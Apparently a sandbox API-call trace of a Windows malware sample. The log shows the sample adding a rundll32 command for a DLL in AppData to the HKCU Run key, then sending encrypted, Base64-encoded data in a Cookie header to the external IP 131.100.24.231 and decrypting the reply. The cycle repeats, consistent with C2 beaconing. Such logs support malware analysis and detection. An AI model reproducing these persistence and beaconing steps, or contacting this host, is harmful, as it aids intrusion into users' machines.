BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x2a76424, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0199.748] GetProcessHeap () returned 0x530000 [0199.748] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c650 [0199.748] GetProcessHeap () returned 0x530000 [0199.748] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0199.748] GetProcessHeap () returned 0x530000 [0199.749] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0199.749] GetProcessHeap () returned 0x530000 [0199.749] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5e6360 | out: hHeap=0x530000) returned 1 [0199.749] GetProcessHeap () returned 0x530000 [0199.749] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0199.750] GetProcessHeap () returned 0x530000 [0199.750] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0199.750] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0199.750] GetProcessHeap () returned 0x530000 [0199.750] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2b5fea8 [0199.750] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",rFbKbpoZMr") returned 100 [0199.750] GetProcessHeap () returned 0x530000 [0199.750] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b5fea8 | out: hHeap=0x530000) returned 1 [0199.750] GetProcessHeap () returned 0x530000 [0199.750] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0199.750] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x648, lpdwDisposition=0x0) returned 0x0 [0199.751] GetProcessHeap () returned 0x530000 [0199.751] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0199.751] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",rFbKbpoZMr") returned 100 [0199.751] RegSetValueExW (in: hKey=0x648, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",rFbKbpoZMr", cbData=0xca | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",rFbKbpoZMr") returned 0x0 [0199.752] RegCloseKey (hKey=0x648) returned 0x0 [0199.752] GetProcessHeap () returned 0x530000 [0199.752] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c650 | out: hHeap=0x530000) returned 1 [0199.752] GetProcessHeap () returned 0x530000 [0199.752] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5afeb0 | out: hHeap=0x530000) returned 1 [0199.752] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xe3080) returned 0x102 [0209.777] GetProcessHeap () returned 0x530000 [0209.777] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x5e8a68 [0209.777] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0209.777] GetProcessHeap () returned 0x530000 [0209.777] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5e8a68 | out: hHeap=0x530000) returned 1 [0209.777] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0209.777] GetProcessHeap () returned 0x530000 [0209.777] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x5e8a68 [0209.778] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0209.778] GetProcessHeap () returned 0x530000 [0209.778] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5e8a68 | out: hHeap=0x530000) returned 1 [0209.778] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2b5fea8 [0209.781] FindNextFileW (in: hFindFile=0x2b5fea8, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0209.781] FindNextFileW (in: hFindFile=0x2b5fea8, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0209.781] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0209.781] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0209.781] FindNextFileW (in: hFindFile=0x2b5fea8, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0209.781] FindClose (in: hFindFile=0x2b5fea8 | out: hFindFile=0x2b5fea8) returned 1 [0209.782] GetProcessHeap () returned 0x530000 [0209.782] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x5afeb0 [0209.782] GetProcessHeap () returned 0x530000 [0209.782] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x5e8a68 [0209.782] GetProcessHeap () returned 0x530000 [0209.782] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2ad1780 [0209.782] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0209.783] GetProcessHeap () returned 0x530000 [0209.783] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5e8a68 | out: hHeap=0x530000) returned 1 [0209.783] GetProcessHeap () returned 0x530000 [0209.783] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2ad1780 | out: hHeap=0x530000) returned 1 [0209.783] GetProcessHeap () returned 0x530000 [0209.783] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2aa3cb0 [0209.783] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0209.783] GetProcessHeap () returned 0x530000 [0209.784] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aa3cb0 | out: hHeap=0x530000) returned 1 [0209.784] GetProcessHeap () returned 0x530000 [0209.784] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0209.784] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0209.784] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x5afeb0, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0209.784] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0209.784] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0209.784] GetProcessHeap () returned 0x530000 [0209.784] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0209.784] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0209.784] GetProcessHeap () returned 0x530000 [0209.784] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x2a76420 [0209.784] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76420, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0209.784] GetProcessHeap () returned 0x530000 [0209.784] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76488 [0209.784] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76420, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76488, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76488, pcbResult=0x2cf4b4) returned 0x0 [0209.785] GetProcessHeap () returned 0x530000 [0209.785] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x103) returned 0x2a5b260 [0209.785] GetProcessHeap () returned 0x530000 [0209.785] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76488 | out: hHeap=0x530000) returned 1 [0209.785] GetProcessHeap () returned 0x530000 [0209.785] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0209.785] CryptBinaryToStringW (in: pbBinary=0x2a5b260, cbBinary=0x103, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0209.785] GetProcessHeap () returned 0x530000 [0209.785] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2ba) returned 0x2b3ac30 [0209.785] CryptBinaryToStringW (in: pbBinary=0x2a5b260, cbBinary=0x103, dwFlags=0x40000001, pszString=0x2b3ac30, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTvlBhVMwDoVF+ncEqWgAC2EulMpKHz0owOjohgjIY5UBFyA4a5mxhdTZdngGviognpkv9BsYGBeJq3Vnj4BIpN9n6hawdcfahPmraAPGn9nBwXS1E6BA1lzB+P1aKnIumht9Yw==", pcchString=0x2cf504) returned 1 [0209.786] GetProcessHeap () returned 0x530000 [0209.786] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0209.786] GetProcessHeap () returned 0x530000 [0209.786] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2aa3b48 [0209.786] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: VYMKMXrFmnRs=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTvlBhVMwDoVF+ncEqWgAC2EulMpKHz0owOjohgjIY5UBFyA4a5mxhdTZdngGviognpkv9BsYGBeJq3Vnj4BIpN9n6hawdcfahPmraAPGn9nBwXS1E6BA1lzB+P1aKnIumht9Yw==\r\n") returned 371 [0209.786] GetProcessHeap () returned 0x530000 [0209.786] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aa3b48 | out: hHeap=0x530000) returned 1 [0209.786] GetProcessHeap () returned 0x530000 [0209.786] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b3ac30 | out: hHeap=0x530000) returned 1 [0209.786] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0209.787] GetProcessHeap () returned 0x530000 [0209.787] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0209.787] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0209.789] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="RShuHPCsvcntVeVPloUCMqSKmqNYvSQbjTDURzDELiTxnpAroacVpj", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0209.789] GetProcessHeap () returned 0x530000 [0209.789] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0209.789] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0209.789] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0209.789] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0209.790] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: VYMKMXrFmnRs=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTvlBhVMwDoVF+ncEqWgAC2EulMpKHz0owOjohgjIY5UBFyA4a5mxhdTZdngGviognpkv9BsYGBeJq3Vnj4BIpN9n6hawdcfahPmraAPGn9nBwXS1E6BA1lzB+P1aKnIumht9Yw==\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0210.891] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0210.891] GetProcessHeap () returned 0x530000 [0210.891] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0210.892] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x23e) returned 1 [0210.892] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b4803e, dwNumberOfBytesToRead=0xfdc2, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b4803e*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0210.892] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0210.892] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0210.892] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0210.892] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0210.892] GetProcessHeap () returned 0x530000 [0210.892] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0210.892] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76420, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76420, pcbResult=0x2cf51c) returned 0x0 [0210.892] GetProcessHeap () returned 0x530000 [0210.892] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x5e8d98 [0210.892] GetProcessHeap () returned 0x530000 [0210.892] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2ad1780 [0210.892] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0210.893] GetProcessHeap () returned 0x530000 [0210.893] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5e8d98 | out: hHeap=0x530000) returned 1 [0210.893] GetProcessHeap () returned 0x530000 [0210.893] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2ad1780 | out: hHeap=0x530000) returned 1 [0210.893] GetProcessHeap () returned 0x530000 [0210.893] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62e28 [0210.894] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0210.894] GetProcessHeap () returned 0x530000 [0210.894] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62e28 | out: hHeap=0x530000) returned 1 [0210.894] GetProcessHeap () returned 0x530000 [0210.894] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0210.894] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0210.894] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2a76468, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0210.894] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0210.894] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0210.894] GetProcessHeap () returned 0x530000 [0210.895] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0210.895] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0210.895] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x2a76424, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0210.897] GetProcessHeap () returned 0x530000 [0210.897] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2bee0f8 [0210.897] GetProcessHeap () returned 0x530000 [0210.897] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0210.897] GetProcessHeap () returned 0x530000 [0210.898] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0210.898] GetProcessHeap () returned 0x530000 [0210.898] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a5b260 | out: hHeap=0x530000) returned 1 [0210.898] GetProcessHeap () returned 0x530000 [0210.899] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0210.899] GetProcessHeap () returned 0x530000 [0210.899] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0210.899] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0210.899] GetProcessHeap () returned 0x530000 [0210.899] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2b5fe68 [0210.899] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",ptbVmiePhYAD") returned 102 [0210.899] GetProcessHeap () returned 0x530000 [0210.900] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b5fe68 | out: hHeap=0x530000) returned 1 [0210.900] GetProcessHeap () returned 0x530000 [0210.900] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0210.900] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x640, lpdwDisposition=0x0) returned 0x0 [0210.900] GetProcessHeap () returned 0x530000 [0210.901] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0210.901] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",ptbVmiePhYAD") returned 102 [0210.901] RegSetValueExW (in: hKey=0x640, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",ptbVmiePhYAD", cbData=0xce | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",ptbVmiePhYAD") returned 0x0 [0210.901] RegCloseKey (hKey=0x640) returned 0x0 [0210.901] GetProcessHeap () returned 0x530000 [0210.902] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bee0f8 | out: hHeap=0x530000) returned 1 [0210.902] GetProcessHeap () returned 0x530000 [0210.902] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5afeb0 | out: hHeap=0x530000) returned 1 [0210.902] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xdcd17) returned 0x102 [0221.026] GetProcessHeap () returned 0x530000 [0221.026] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x5e8d98 [0221.026] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0221.026] GetProcessHeap () returned 0x530000 [0221.026] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5e8d98 | out: hHeap=0x530000) returned 1 [0221.026] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0221.026] GetProcessHeap () returned 0x530000 [0221.027] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x5e8d98 [0221.027] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0221.027] GetProcessHeap () returned 0x530000 [0221.027] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5e8d98 | out: hHeap=0x530000) returned 1 [0221.027] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2b5fe68 [0221.028] FindNextFileW (in: hFindFile=0x2b5fe68, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0221.028] FindNextFileW (in: hFindFile=0x2b5fe68, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", 